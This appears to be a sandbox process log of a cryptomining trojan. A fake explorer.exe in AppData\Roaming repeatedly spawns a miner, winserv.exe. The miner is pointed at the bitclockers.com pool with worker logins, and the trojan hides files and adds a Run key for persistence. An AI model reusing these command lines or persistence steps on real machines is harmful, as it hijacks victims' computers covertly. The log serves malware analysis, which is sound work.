C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:3760 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5332
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
PID:4428 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:716
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6124
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5304
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5492
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:552
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5320
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5712
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5844
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5820
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1276
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2256
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1028
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1224
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:400
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2540
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5864
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5612
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3168
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5168
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3360
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3588
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2180
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4548
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:576
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5364
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3048
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4840
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6044
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:744
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5644
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5700
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2064
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2804
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3500
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3712
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1664
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3420
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4656
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6132
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3180
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1896
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5864
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1608
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5312
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1068
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3436
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4244
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4528
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5820
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5532
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:784
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5644
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6040
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2184
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3908
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1548
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2660
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1212
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4928
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5520
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1684
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4988
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2248
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4752
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2604
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4468
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4888
-
